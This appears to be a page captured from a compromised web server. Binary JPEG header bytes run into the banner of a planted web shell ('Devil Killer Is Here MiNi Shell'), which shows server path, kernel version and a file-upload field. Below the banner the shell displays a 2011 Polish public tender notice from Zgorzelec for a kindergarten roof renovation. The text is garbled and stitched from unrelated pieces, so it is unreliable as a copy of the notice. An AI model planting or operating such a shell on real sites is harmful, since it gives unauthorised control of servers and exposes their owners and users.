JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110307/37106-N-2011.html

<p class="kh_header"><b>Zgorzelec: Modernizacja dachu Przedszkola Niepublicznego nr 2</b><br>
<b>Numer ogłoszenia: 37106 - 2011; data zamieszczenia: 07.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja dachu Przedszkola Niepublicznego nr 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia  są roboty budowlane polegające na wykonaniu remontu pokrycia dachowego, budynku Przedszkola Niepublicznego nr 2 położonego w Zgorzelcu przy ul. Brzozowej 1. 
2.	Pokrycie dachowe, o którym mowa w punkcie 1,  należy wykonać z dachówki 
      ceramicznej karpiówki. 
3.	Budynek, na którym zostaną przeprowadzone roboty budowlane  jest wolnostojący, murowany,  z dachem stromym wielospadowym, kryty dachówką ceramiczną karpiówką w koronkę. Wybudowany w latach 20-tych XX wieku. 
4.	 Zakres robót obejmuje:
1)   zdjęcie istniejącego pokrycia, 
2)   wymiana uszkodzonych elementów konstrukcyjnych więźby dachowej, 
3)   przemurowanie kominów z zachowaniem formy i pokrycia stylowego, 
4)   wykonanie obróbek blacharskich z blachy tytan - cynk 0,60 mm, 
5)   montaż rynien i rur spustowych z blachy tytan-cynk 0,60 mm, 
6)   wymiana więzłów dachowych, 
7)   wykonanie izolacji paroprzepuszczalnej połaci dachowej, 
8)   wymiana łat drewnianych, 
9)   montaż nowego pokrycia dachowego z dachówki karpiówki, 
10) montaż ław kominiarskich, 
11) montaż płotków przeciwśniegowych, 
12) wymiana instalacji odgromowej, 
13) uprzątnięcie placu budowy. 

5.   Przed przystąpieniem do robót rozbiórkowych teren należy ogrodzić i oznakować, 
      zgodnie z wymogami BHP.  Roboty rozbiórkowe należy prowadzić zgodnie z 
      Rozporządzeniem Ministra Infrastruktury z dnia 06.02.2003r. (Dz. U. Nr 47, poz.401) w 
      sprawie bezpieczeństwa  i higieny pracy podczas wykonywania robót budowlanych. 

6.  Szczegółowy opis i zakres robót dla zadania objętego modernizacją dachu Przedszkola
Niepublicznego nr 2, został zawarty   w dokumentacji projektowej składającej się z 
projektu budowlanego, Specyfikacji Technicznej Wykonania i Odbioru Robót,  
      projektu wykonawczego, rysunków - załącznik nr 9 do SIWZ.     

7.   Wykonawca jako wytwórca odpadów w rozumieniu art. 3 ust. 3 pkt 22 ustawy o 
      odpadach, ma obowiązek zagospodarowania odpadów powstałych podczas realizacji 
      zamówienia, zgodnie z ustawą o odpadach z dnia 27 kwietnia 2001r. (tekst jednolity z 
      2007r. Dz. U. Nr 39, poz. 251 z późn. zm.)  i ustawą Prawo ochrony środowiska  z dnia 
      27 kwietnia 2001r. (tekst jednolity z 2008r. Dz. U. Nr 25, poz.150 z późn.zm.). 
 
8.   Wykonawca przedstawi Zamawiającemu potwierdzenie zagospodarowania odpadów
       zgodnie z powszechnie obowiązującymi przepisami.        

9.  Zobowiązuje się Wykonawcę do opracowania kompletnej dokumentacji 
      powykonawczej w 2-ch  egzemplarzach  i przekazanie jej Zamawiającemu 
      wraz ze zgłoszeniem gotowości robót  budowlanych do odbioru.  
      W skład kompletnej dokumentacji powykonawczej wchodzi:
      1) atesty i certyfikaty wbudowanych materiałów, prefabrykatów lub urządzeń, 
      2) aprobaty techniczne, 
      3) uzupełniony dziennik robót, 
      4) wymagane przepisami, protokoły i zaświadczenia z przeprowadzonych przez 
          Wykonawcę badań i sprawdzeń,       
      5) oświadczenie kierownika budowy  o zgodności wykonania obiektu budowlanego
           z projektem budowlanym, warunkami pozwolenia na budowę/lub zgłoszenia robót, 
           przepisami i obowiązującymi Polskimi Normami oraz oświadczenie kierownika 
           budowy o doprowadzeniu do należytego stanu i porządku terenu budowy, a także 
           sąsiedniej ulicy, nieruchomości, 
      6) oświadczenie zarzadcy budynku na którym prowadzona była inwestycja o 
           przywróceniu terenu do stanu pierwotnego, 
      7)  w  przypadku zmian nie odstępujących w sposób istotny od zatwierdzonego projektu i 
           warunków zgłoszenia robót niewymagających pozwolenia na budowę, Wykonawca  
           dołączy kopie rysunków wchodzących  w skład zatwierdzonego projektu 
           budowlanego, z naniesionymi zmianami i uzupełniającym opisem, w takim przypadku 
           oświadczenie kierownika budowy powinno być zatwierdzone przez Projektanta i 
           Inspektora Nadzoru, 
      8)  oświadczenie kierownika budowy o wbudowaniu materiałów, na które dostarczono 
           dokumenty odbiorowe,  oraz zgodność materiałów z ST i projektem budowlanym, 
      9)  oświadczenie Inspektora Nadzoru Inwestorskiego o zgodności wykonania obiektu
           budowlanego z projektem budowlanym,   przepisami  i  obowiązującymi Polskimi 
           Normami, 
     10) pisemną gwarancję jakości na wykonany przedmiot umowy, z treści dokumentu 
           gwarancyjnego powinno wynikać, na co jest udzielona gwarancja, jak długo 
           gwarancja obejmuje,  
     
    11) deklarację zgodności materiałów z określeniem miejsca przeznaczenia zgodnie z 
          ustawą z dnia 16.04.2004r. o wyrobach budowlanych (Dz. U.z 2004r. Nr 92 poz. 881 z 
          późn.zm.) oraz ustawą z dnia 30.08.2002r.o systemie oceny zgodności (tekst jednolity 
          z 2010r., Dz.U. Nr 138, poz. 935). 

10.     Przed wbudowaniem materiałów budowlanych wykorzystanych w trakcie realizacji 
          robót, Wykonawca ma obowiązek uzyskać ich zatwierdzenia przez Inspektora 
          Nadzoru. 

11.    Przed przystąpieniem do w/w robót Wykonawca winien   dokonać wizji lokalnej 
         terenu, objętego robotą budowlaną, celem zapoznania się z warunkami realizacji 
         przedmiotu zamówienia.  Wizję lokalną Wykonawca dokona na koszt własny. 

12.   Wykonawca zobowiązany jest  wykonać przedmiot zamówienia zgodnie z 
        dokumentacją projektową,  technologią wskazaną przez Projektanta, zgodnie z zasadami 
        wiedzy  technicznej, normami,  wskazaniami Zamawiającego, oraz obowiązującymi   
        przepisami.

13.  Wykonawca wykona przedmiot zamówienia z materiałów własnych, które powinny 
        odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania w 
        budownictwie zgodnie z  art. 10 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst 
        jednolity z 2006r. Dz. U. Nr 156, poz. 1118 z późn.zm.). 

14.  Zamawiający wymaga 36 miesięcznego okresu gwarancji i rękojmi na wykonane roboty 
        budowlane  i zastosowane przy realizacji zamówienia materiały budowlane. 
        W dniu podpisania bezusterkowego protokołu końcowego odbioru robót, Wykonawca  
        potwierdzi  Zamawiającemu udzielenie gwarancji jakości  na wykonany  przedmiot 
        umowy  i zastosowane do realizacji zamówienia  materiały wraz z podaniem terminu 
        upływu gwarancji. 
        Jeżeli producent udzieli dłuższej gwarancji na materiały zastosowane do wykonania 
        przedmiotu zamówienia, obowiązywać będzie  gwarancja producenta.

15.  W ramach udzielonej gwarancji Wykonawca zobowiązany będzie do przeprowadzania  
        w  każdym roku kalendarzowym, przeglądów  gwarancyjnych a także  przeglądu 
        pogwarancyjnego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Roboty budowlane polegające na powtórzeniu tego samego rodzaju zamówień, stanowiące nie
więcej niż 50% wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt. 6 ustawy Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.10.00-4, 45.26.21.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 109.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.   Zamawiający żąda od wykonawców wniesienia wadium w wysokości 2900,00 zł. PLN 
      (słownie: dwa tysiące dziewięćset zł.)
2.   Wykonawca obowiązany jest wnieść wadium przed upływem terminu składania ofert. 
      Wadium musi być na koncie Zamawiającego przed upływem terminu składania 
      ofert.  
3.   Wykonawca, który nie wniesie wadium do upływu terminu składania ofert, na 
        przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 
        ustawy Pzp, albo nie zgodzi się na przedłużenie okresu związania ofertą zostanie 
        wykluczony z postępowania o udzielenie zamówienia, a oferta Wykonawcy 
        wykluczonego zostanie odrzucona zgodnie z art. 24 ust. 2 pkt. 4 ustawy Pzp.
4.    W zależności od woli wykonawcy wadium może być wnoszone w następujących  
        formach:
1)	pieniądzu,
        2)   poręczeniach bankowych lub poręczeniach spółdzielczej  kasy oszczędnościowo-
              kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
        3)   gwarancjach bankowych,
        4)   gwarancjach ubezpieczeniowych,
        5)   poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2
              ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju 
              Przedsiębiorczości   (Dz.U. Nr 109, poz. 1158 z póź.zm.).
UWAGA!
Wadium wniesione w formach o których mowa w art. 45 ust. 6 pkt. 2-5 ustawy 
Pzp  musi gwarantować  Beneficjentowi zapłatę sumy gwarancyjnej jeżeli 
Wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 
ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których  mowa w art. 25 
ust. 1, lub pełnomocnictw.  
5.    Zamawiający wymaga załączenia do oferty dokumentu potwierdzającego 
       wniesienie wadium do Zamawiającego.
6.    Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
       Zamawiającego Nr 35124012971111000025654013 Bank PEKAO S.A. I
       O/Zgorzelec.
       Na przelewie należy  umieścić informację :
       Wadium na Modernizacja dachu Przedszkola Niepublicznego nr 2                   
7.    Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze
       najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, 
       którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 24.13 
       SIWZ. 
8.    Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający 
       zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego 
       oraz wniesieniu zabezpieczenia należytego wykonania umowy.  
9.    Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał 
       ofertę przed  upływem terminu składania ofert. 
10.  Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu
       zwrócono wadium na podstawie art. 46 ust. 1 ustawy Pzp , jeżeli w wyniku 
       ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako 
       najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez 
       Zamawiającego. 
11. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami
      wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
      pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej 
      za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę .
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
      oferta  została wybrana :
      a/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
          określonych w ofercie, 
      b/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
      c/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
          przyczyn   leżących  po stronie wykonawcy.
13.  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w 
       odpowiedzi  na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył 
       dokumentów lub oświadczeń,   o których mowa w art. 25 ust. 1 ustawy Pzp, chyba 
       że udowodni, ze wynika to z przyczyn należących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie                                     
    w oparciu o analizę przedłożonych przez Wykonawców dokumentów i oświadczeń,  
    określonych przez Zamawiającego  w pkt.11 - 12 SIWZ. 
2) Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
    spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny.       
3) Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających 
    spełnienie warunków udziału w postępowaniu zostaną wykluczeni z postępowania
    z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.   
4) Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, iż wykonał: 
     - dwie roboty budowlane polegające na wykonaniu konstrukcji dachu wraz z 
 pokryciem nowego dachu lub remontu konstrukcji dachu wraz z  jego          
 pokryciem o łącznej  wartości brutto min. 170 000,00 zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)  Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie                                     
     w oparciu o analizę przedłożonych przez Wykonawców dokumentów i oświadczeń,  
     określonych przez Zamawiającego  w pkt.11 - 12 SIWZ. 
 2) Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
     spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny.         
 3) Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających 
     spełnienie warunków udziału w postępowaniu zostaną wykluczeni z postępowania
     z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.   
4) Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż dysponuje  
     minimum 1 osobą, która będzie wykonywać zamówienie,  posiadającą           
     prawo wykonywania samodzielnych funkcji technicznych w budownictwie do 
     kierowania robotami budowlanymi  w specjalności konstrukcyjno-budowlanej, 
     wraz z informacją Wykonawcy o podstawie do dysponowania tą osobą.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi załączyć następujące dokumenty:   
       1)  wypełniony i podpisany formularz ofertowy (wg. załączonego wzoru), 
       2)  informacja  na temat Wykonawcy (wg zał. wzoru ) - załącznik nr 1 do SIWZ
            (w przypadku złożenia oferty wspólnej, dokument składa każdy z członków 
            konsorcjum), 
       3)  oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. Prawo  
            zamówień   publicznych - załącznik nr 2 do SIWZ, 
            Powyższe oświadczenie, Wykonawca składa w przypadku gdy  zamierza 
            powierzyć do wykonania  części zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy
   tak  1   nie 0
Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian 
 Zamawiający przewidział możliwość dokonania zmian postanowień umowy,  przy czym 
 warunki takiej zmiany Zamawiający określił  w § 12 ust. 2  projektu umowy. 
 1. Zakres przewidzianych zmian: 
     1) termin określony w pkt. 4 SIWZ i § 3 ust. 1 projektu umowy  ulegnie  przesunięciu w 
         przypadku wystąpienia opóźnień wynikających z:  
         a) opóźnień zawinionych przez Zamawiającego, tzn. jeżeli takie opóźnienie jest lub               
             będzie miało wpływ na termin realizacji przedmiotu umowy,  w szczególności dot. 
              przekazania terenu budowy, dokonania odbioru końcowego robót, przekazania  
             dokumentacji projektowej, 
         b) opóźnień z powodu wystąpienia warunków   atmosferycznych uniemożliwiających 
              wykonanie robót budowlanych zgodnie z technologią  - fakt ten musi mieć 
              odzwierciedlenie w dzienniku robót i musi być potwierdzony przez Inspektora 
              Nadzoru Inwestorskiego działającego z ramienia Zamawiającego, 
         c)  z przyczyn losowych, w przypadku wystąpienia działania siły wyższej, mającej 
              bezpośredni wpływ na terminowość wykonania robót budowlanych. Pod pojęciem 
              siły wyższej strony rozumieć będą  zdarzenie zewnętrzne o charakterze: 
              niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem 
              umowy i którego nie można uniknąć ani któremu strony nie mogły zapobiec przy 
              zachowaniu należytej staranności.  
              Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności:
              powódź, pożar i inne klęski żywiołowe, zamieszki, strajki (nie dotyczą 
              pracowników Wykonawcy), ataki terrorystyczne, działania wojenne, nagłe przerwy 
              w dostawie energii elektrycznej, promieniowanie, lub skażenia, 
          d) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym 
              wpływ na realizację przedmiotu zamówienia,                  
          e) wstrzymania robót budowlanych  przez uprawnione do tego organy w 
              okolicznościach, za które Wykonawca nie ponosi odpowiedzialności,         
          f)  w przypadku wystąpienia istotnych wad dokumentacji projektowej, skutkujących 
               koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub 
               istotnie wstrzymuje realizację określonego rodzaju robót, 
         2)  Zmiana osób wskazanych w umowie z imienia i nazwiska odpowiedzialnych za 
              realizację umowy, o których mowa w § 11 projektu umowy.    
         3)  Zmiana Podwykonawcy możliwa będzie jedynie wtedy, gdy zakres realizowanych 
              przez Podwykonawcę robót, nie ulegnie zmianie w stosunku do zakresu robót 
              wskazanych w ofercie Wykonawcy, a które zaplanował on do realizacji przez 
              Podwykonawcę. Zmiana taka możliwa będzie jedynie na uzasadniony  wniosek 
              Wykonawcy, do którego winien załączyć projekt umowy z Podwykonawcą, przy 
              czym wymagana jest w tym przypadku pisemna zgoda Zamawiającego na zawarcie 
              przez Wykonawcę umowy z innym Podwykonawcą. 
2.   W przedstawionych w punkcie 1 podpunkt 1 przypadkach wystąpienia opóźnień, 
      strony ustalają nowe terminy realizacji umowy, z tym, że okres  przesunięcia 
      terminu realizacji przedmiotu umowy równy będzie co najmniej okresowi przerwy lub 
      postoju. 
3.   Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych 
      okoliczności w formie opisowej i właściwie umotywowanej, potwierdzonej przez każdą 
      ze stron umowy. 
4.   Strona ubiegająca się o zmianę umowy w w/w przypadkach, winna zwrócić się do  
      Wykonawcy/Zamawiającego w formie pisemnej z wnioskiem,  o wprowadzenie 
